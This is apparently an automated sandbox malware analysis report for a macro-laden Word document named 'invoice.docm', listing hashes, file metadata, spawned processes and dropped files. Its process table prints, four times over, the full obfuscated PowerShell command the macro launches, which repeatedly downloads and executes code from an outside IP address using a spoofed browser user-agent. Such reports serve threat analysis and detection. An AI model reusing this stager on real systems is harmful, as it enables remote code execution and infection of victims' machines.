File name: | invoice.docm |
Full analysis: | https://app.any.run/tasks/d98f07ad-1462-47d9-99e7-750bcae2dd0a |
Verdict: | Malicious activity |
Analysis date: | September 11, 2019, 09:21:45 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.openxmlformats-officedocument.wordprocessingml.document |
File info: | Microsoft Word 2007+ |
MD5: | D5AC8BFEDEEE7C2940BA1114270C6D75 |
SHA1: | BE53956D96F256B9B1BDF06B90751C4F89FD7AAB |
SHA256: | F33DA2F50C57D73A91119DA1FA5761D63B1F29B28CC7BBA5611838E85B6BB558 |
SSDEEP: | 3072:1OQRJBV94DV6bTd7vDYsEah2+n3udy/QH:tJBVCCRTDYsVh2Or/o |
.docm | | | Word Microsoft Office Open XML Format document (with Macro) (53.6) |
---|---|---|
.docx | | | Word Microsoft Office Open XML Format document (24.2) |
.zip | | | Open Packaging Conventions container (18) |
.zip | | | ZIP compressed archive (4.1) |
AppVersion: | 16 |
---|---|
HyperlinksChanged: | No |
SharedDoc: | No |
CharactersWithSpaces: | 1 |
LinksUpToDate: | No |
Company: | - |
ScaleCrop: | No |
Paragraphs: | 1 |
Lines: | 1 |
DocSecurity: | None |
Application: | Microsoft Office Word |
Characters: | 1 |
Words: | - |
Pages: | 1 |
TotalEditTime: | - |
Template: | Normal.dotm |
ModifyDate: | 2019:04:29 07:08:00Z |
CreateDate: | 2019:04:29 06:54:00Z |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Keywords: | - |
Description: | - |
---|---|
Creator: | - |
Subject: | - |
Title: | - |
ZipFileName: | [Content_Types].xml |
---|---|
ZipUncompressedSize: | 1900 |
ZipCompressedSize: | 436 |
ZipCRC: | 0x928413df |
ZipModifyDate: | 1980:01:01 00:00:00 |
ZipCompression: | Deflated |
ZipBitFlag: | 0x0006 |
ZipRequiredVersion: | 20 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2892 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\invoice.docm" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2200 | C:\winDOWS\sYstEm32\CmD /c poWERsHELL " &((gv '*mdr*').nAMe[3,11,2]-joIn'') (('tpIthese = FjLareFjL;tpIare = ne'+'w-obje'+'ct System.Net.WebClient;tpItoken=(FjL{7}{6}{5}{0}{3}{1}{4}{2'+'}FjL-fnRfbecnRf,nRf3nRf,nRf9nRf,nRf1nRf,nRf8365nRf,nRf407b-a7d9-0dnRf,nRf5e-a512-nRf,nRf3f33f5nRf);tpIuseless = 443;tpIvariables=(FjL{1}{3}{0}{2}FjL-f nRfe/lonRf,nRf'+'googlenRf,'+'nRfginnRf,nRf.dnRf);tpIUserAgent = ((FjL{8}{10}{4}{1'+'}{11'+'}{6}{12}{16}{7}{13'+'}{14}{5}'+'{9}{0}{3}{2}{15}FjL -f nRfo/20100'+'101'+' FirefnRf,nRf5.0nRf,nRf/60.nRf,nR'+'foxnRf,nRfla/nRf'+',nR'+'f.'+'0) nRf,nRfows NT 10.nRf,nRf64; rvnRf,nRfMozinRf,nRfGecknRf,nRflnRf,nRf (WindnRf,nRf0; Win6nRf,nRf:nRf,nRf60nRf,nRf0nRf,nRf4; xnRf));tpIidentifier = (1..20 5UE %{ nRf{0:X}nRf -f (Get-Ra'+'ndom -Max 16) }) -join nRfnRf;while(tpItrue){ . { tpIWcl = new-object System.Net.WebClient; tpIuse'+'less++; tpIWcl.H'+'eaders.Add((FjL{1}{0}{2}FjL-f nRfnnRf,nRfuser'+'-agenRf,nRftnR'+'f), tpIUserAgent); tp'+'IWcl.Headers.Add((F'+'jL{0}{2}{1}FjL -f nR'+'fIdenRf,nRfifiernRf,nRfntnRf), tpIidentifier); tpIWcl.Proxy.Credentials = [System.N'+'et.CredentialCache]::DefaultNetworkCredentials; tpIua=tpIu'+'seragent.ToCharArray();[array]::Reverse(tp'+'Iua);tpIurI=(FjL{2}{1}{0}FjL-fnRf//nRf,nRfp:nRf,nRfhttnRf)+(FjL{3}{2}{1}{0}FjL -fnRf.48nRf,nRf.11nRf,nRf3.95nRf,nRf1nRf)+(FjL{2}{1}{'+'0}FjL -f '+'nRfrmnRf,nRfonRf,n'+'Rf/artnRf); tpIUsreAgent=-join(tpIua); tpIurl=(FjL{1}{0}{2}FjL-fnRfttp:/nRf,nRfhnRf,nRf/nRf)+(F'+'jL{1}{2}{0}FjL -fnRf.11.48nRf,nRf13.nRf,nRf95nRf)+(FjL{1}{0}FjL -fnRfrmnR'+'f,nRf/aartonRf); iwr -Uri tpIurl -UserAgent tpIUsreAgent -Headers @{(FjL{1}{0}{2}FjL-f nRfdenRf,nRfInRf,nRfntifiernRf) = tpIidentifier} 5UE iex;}}').RePLace(([ChaR]53+[ChaR]85+[ChaR]69),'|').RePLace(([ChaR]70+[ChaR]106+[ChaR]76),[StRIng][ChaR]34).RePLace(([ChaR]116+[ChaR]112+[ChaR]73),[StRIng][ChaR]36).RePLace('nRf',[StRIng][ChaR]39) )" | C:\winDOWS\sYstEm32\CmD.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2904 | poWERsHELL " &((gv '*mdr*').nAMe[3,11,2]-joIn'') (('tpIthese = FjLareFjL;tpIare = ne'+'w-obje'+'ct System.Net.WebClient;tpItoken=(FjL{7}{6}{5}{0}{3}{1}{4}{2'+'}FjL-fnRfbecnRf,nRf3nRf,nRf9nRf,nRf1nRf,nRf8365nRf,nRf407b-a7d9-0dnRf,nRf5e-a512-nRf,nRf3f33f5nRf);tpIuseless = 443;tpIvariables=(FjL{1}{3}{0}{2}FjL-f nRfe/lonRf,nRf'+'googlenRf,'+'nRfginnRf,nRf.dnRf);tpIUserAgent = ((FjL{8}{10}{4}{1'+'}{11'+'}{6}{12}{16}{7}{13'+'}{14}{5}'+'{9}{0}{3}{2}{15}FjL -f nRfo/20100'+'101'+' FirefnRf,nRf5.0nRf,nRf/60.nRf,nR'+'foxnRf,nRfla/nRf'+',nR'+'f.'+'0) nRf,nRfows NT 10.nRf,nRf64; rvnRf,nRfMozinRf,nRfGecknRf,nRflnRf,nRf (WindnRf,nRf0; Win6nRf,nRf:nRf,nRf60nRf,nRf0nRf,nRf4; xnRf));tpIidentifier = (1..20 5UE %{ nRf{0:X}nRf -f (Get-Ra'+'ndom -Max 16) }) -join nRfnRf;while(tpItrue){ . { tpIWcl = new-object System.Net.WebClient; tpIuse'+'less++; tpIWcl.H'+'eaders.Add((FjL{1}{0}{2}FjL-f nRfnnRf,nRfuser'+'-agenRf,nRftnR'+'f), tpIUserAgent); tp'+'IWcl.Headers.Add((F'+'jL{0}{2}{1}FjL -f nR'+'fIdenRf,nRfifiernRf,nRfntnRf), tpIidentifier); tpIWcl.Proxy.Credentials = [System.N'+'et.CredentialCache]::DefaultNetworkCredentials; tpIua=tpIu'+'seragent.ToCharArray();[array]::Reverse(tp'+'Iua);tpIurI=(FjL{2}{1}{0}FjL-fnRf//nRf,nRfp:nRf,nRfhttnRf)+(FjL{3}{2}{1}{0}FjL -fnRf.48nRf,nRf.11nRf,nRf3.95nRf,nRf1nRf)+(FjL{2}{1}{'+'0}FjL -f '+'nRfrmnRf,nRfonRf,n'+'Rf/artnRf); tpIUsreAgent=-join(tpIua); tpIurl=(FjL{1}{0}{2}FjL-fnRfttp:/nRf,nRfhnRf,nRf/nRf)+(F'+'jL{1}{2}{0}FjL -fnRf.11.48nRf,nRf13.nRf,nRf95nRf)+(FjL{1}{0}FjL -fnRfrmnR'+'f,nRf/aartonRf); iwr -Uri tpIurl -UserAgent tpIUsreAgent -Headers @{(FjL{1}{0}{2}FjL-f nRfdenRf,nRfInRf,nRfntifiernRf) = tpIidentifier} 5UE iex;}}').RePLace(([ChaR]53+[ChaR]85+[ChaR]69),'|').RePLace(([ChaR]70+[ChaR]106+[ChaR]76),[StRIng][ChaR]34).RePLace(([ChaR]116+[ChaR]112+[ChaR]73),[StRIng][ChaR]36).RePLace('nRf',[StRIng][ChaR]39) )" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | CmD.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2960 | C:\winDOWS\sYstEm32\CmD /c poWERsHELL " &((gv '*mdr*').nAMe[3,11,2]-joIn'') (('tpIthese = FjLareFjL;tpIare = ne'+'w-obje'+'ct System.Net.WebClient;tpItoken=(FjL{7}{6}{5}{0}{3}{1}{4}{2'+'}FjL-fnRfbecnRf,nRf3nRf,nRf9nRf,nRf1nRf,nRf8365nRf,nRf407b-a7d9-0dnRf,nRf5e-a512-nRf,nRf3f33f5nRf);tpIuseless = 443;tpIvariables=(FjL{1}{3}{0}{2}FjL-f nRfe/lonRf,nRf'+'googlenRf,'+'nRfginnRf,nRf.dnRf);tpIUserAgent = ((FjL{8}{10}{4}{1'+'}{11'+'}{6}{12}{16}{7}{13'+'}{14}{5}'+'{9}{0}{3}{2}{15}FjL -f nRfo/20100'+'101'+' FirefnRf,nRf5.0nRf,nRf/60.nRf,nR'+'foxnRf,nRfla/nRf'+',nR'+'f.'+'0) nRf,nRfows NT 10.nRf,nRf64; rvnRf,nRfMozinRf,nRfGecknRf,nRflnRf,nRf (WindnRf,nRf0; Win6nRf,nRf:nRf,nRf60nRf,nRf0nRf,nRf4; xnRf));tpIidentifier = (1..20 5UE %{ nRf{0:X}nRf -f (Get-Ra'+'ndom -Max 16) }) -join nRfnRf;while(tpItrue){ . { tpIWcl = new-object System.Net.WebClient; tpIuse'+'less++; tpIWcl.H'+'eaders.Add((FjL{1}{0}{2}FjL-f nRfnnRf,nRfuser'+'-agenRf,nRftnR'+'f), tpIUserAgent); tp'+'IWcl.Headers.Add((F'+'jL{0}{2}{1}FjL -f nR'+'fIdenRf,nRfifiernRf,nRfntnRf), tpIidentifier); tpIWcl.Proxy.Credentials = [System.N'+'et.CredentialCache]::DefaultNetworkCredentials; tpIua=tpIu'+'seragent.ToCharArray();[array]::Reverse(tp'+'Iua);tpIurI=(FjL{2}{1}{0}FjL-fnRf//nRf,nRfp:nRf,nRfhttnRf)+(FjL{3}{2}{1}{0}FjL -fnRf.48nRf,nRf.11nRf,nRf3.95nRf,nRf1nRf)+(FjL{2}{1}{'+'0}FjL -f '+'nRfrmnRf,nRfonRf,n'+'Rf/artnRf); tpIUsreAgent=-join(tpIua); tpIurl=(FjL{1}{0}{2}FjL-fnRfttp:/nRf,nRfhnRf,nRf/nRf)+(F'+'jL{1}{2}{0}FjL -fnRf.11.48nRf,nRf13.nRf,nRf95nRf)+(FjL{1}{0}FjL -fnRfrmnR'+'f,nRf/aartonRf); iwr -Uri tpIurl -UserAgent tpIUsreAgent -Headers @{(FjL{1}{0}{2}FjL-f nRfdenRf,nRfInRf,nRfntifiernRf) = tpIidentifier} 5UE iex;}}').RePLace(([ChaR]53+[ChaR]85+[ChaR]69),'|').RePLace(([ChaR]70+[ChaR]106+[ChaR]76),[StRIng][ChaR]34).RePLace(([ChaR]116+[ChaR]112+[ChaR]73),[StRIng][ChaR]36).RePLace('nRf',[StRIng][ChaR]39) )" | C:\winDOWS\sYstEm32\CmD.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3416 | poWERsHELL " &((gv '*mdr*').nAMe[3,11,2]-joIn'') (('tpIthese = FjLareFjL;tpIare = ne'+'w-obje'+'ct System.Net.WebClient;tpItoken=(FjL{7}{6}{5}{0}{3}{1}{4}{2'+'}FjL-fnRfbecnRf,nRf3nRf,nRf9nRf,nRf1nRf,nRf8365nRf,nRf407b-a7d9-0dnRf,nRf5e-a512-nRf,nRf3f33f5nRf);tpIuseless = 443;tpIvariables=(FjL{1}{3}{0}{2}FjL-f nRfe/lonRf,nRf'+'googlenRf,'+'nRfginnRf,nRf.dnRf);tpIUserAgent = ((FjL{8}{10}{4}{1'+'}{11'+'}{6}{12}{16}{7}{13'+'}{14}{5}'+'{9}{0}{3}{2}{15}FjL -f nRfo/20100'+'101'+' FirefnRf,nRf5.0nRf,nRf/60.nRf,nR'+'foxnRf,nRfla/nRf'+',nR'+'f.'+'0) nRf,nRfows NT 10.nRf,nRf64; rvnRf,nRfMozinRf,nRfGecknRf,nRflnRf,nRf (WindnRf,nRf0; Win6nRf,nRf:nRf,nRf60nRf,nRf0nRf,nRf4; xnRf));tpIidentifier = (1..20 5UE %{ nRf{0:X}nRf -f (Get-Ra'+'ndom -Max 16) }) -join nRfnRf;while(tpItrue){ . { tpIWcl = new-object System.Net.WebClient; tpIuse'+'less++; tpIWcl.H'+'eaders.Add((FjL{1}{0}{2}FjL-f nRfnnRf,nRfuser'+'-agenRf,nRftnR'+'f), tpIUserAgent); tp'+'IWcl.Headers.Add((F'+'jL{0}{2}{1}FjL -f nR'+'fIdenRf,nRfifiernRf,nRfntnRf), tpIidentifier); tpIWcl.Proxy.Credentials = [System.N'+'et.CredentialCache]::DefaultNetworkCredentials; tpIua=tpIu'+'seragent.ToCharArray();[array]::Reverse(tp'+'Iua);tpIurI=(FjL{2}{1}{0}FjL-fnRf//nRf,nRfp:nRf,nRfhttnRf)+(FjL{3}{2}{1}{0}FjL -fnRf.48nRf,nRf.11nRf,nRf3.95nRf,nRf1nRf)+(FjL{2}{1}{'+'0}FjL -f '+'nRfrmnRf,nRfonRf,n'+'Rf/artnRf); tpIUsreAgent=-join(tpIua); tpIurl=(FjL{1}{0}{2}FjL-fnRfttp:/nRf,nRfhnRf,nRf/nRf)+(F'+'jL{1}{2}{0}FjL -fnRf.11.48nRf,nRf13.nRf,nRf95nRf)+(FjL{1}{0}FjL -fnRfrmnR'+'f,nRf/aartonRf); iwr -Uri tpIurl -UserAgent tpIUsreAgent -Headers @{(FjL{1}{0}{2}FjL-f nRfdenRf,nRfInRf,nRfntifiernRf) = tpIidentifier} 5UE iex;}}').RePLace(([ChaR]53+[ChaR]85+[ChaR]69),'|').RePLace(([ChaR]70+[ChaR]106+[ChaR]76),[StRIng][ChaR]34).RePLace(([ChaR]116+[ChaR]112+[ChaR]73),[StRIng][ChaR]36).RePLace('nRf',[StRIng][ChaR]39) )" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | CmD.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2892 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR9CF0.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2892 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\mso9F33.tmp | — | |
MD5:— | SHA256:— | |||
2904 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IH0SZXEVCBGMV7UKITE8.temp | — | |
MD5:— | SHA256:— | |||
3416 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\779ITIM4R5ULLNCQ8DBJ.temp | — | |
MD5:— | SHA256:— | |||
3416 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF174ecc.TMP | binary | |
MD5:0F2CAD9746414ABA31294C3B560FCFD5 | SHA256:19AD383DED364BB44DED7C7CF00EB6254E5E98D696632944F6BC36724306EE15 | |||
2904 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF16a56c.TMP | binary | |
MD5:0F2CAD9746414ABA31294C3B560FCFD5 | SHA256:19AD383DED364BB44DED7C7CF00EB6254E5E98D696632944F6BC36724306EE15 | |||
3416 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:0F2CAD9746414ABA31294C3B560FCFD5 | SHA256:19AD383DED364BB44DED7C7CF00EB6254E5E98D696632944F6BC36724306EE15 | |||
2904 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:0F2CAD9746414ABA31294C3B560FCFD5 | SHA256:19AD383DED364BB44DED7C7CF00EB6254E5E98D696632944F6BC36724306EE15 | |||
2892 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$nvoice.docm | pgc | |
MD5:67C48A54096B88298F1DF93035B3C987 | SHA256:F5E6D1681DB0A49F6EDCA502D5F0B78FCC8950BA39D87D9A76EEAF75A9C06030 | |||
2892 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:62F2DA178DD59EBA6B61EE250E55F925 | SHA256:8CF938206B83D51659082A32A71F3A9F077217F5A2E07A98541350C60245A244 |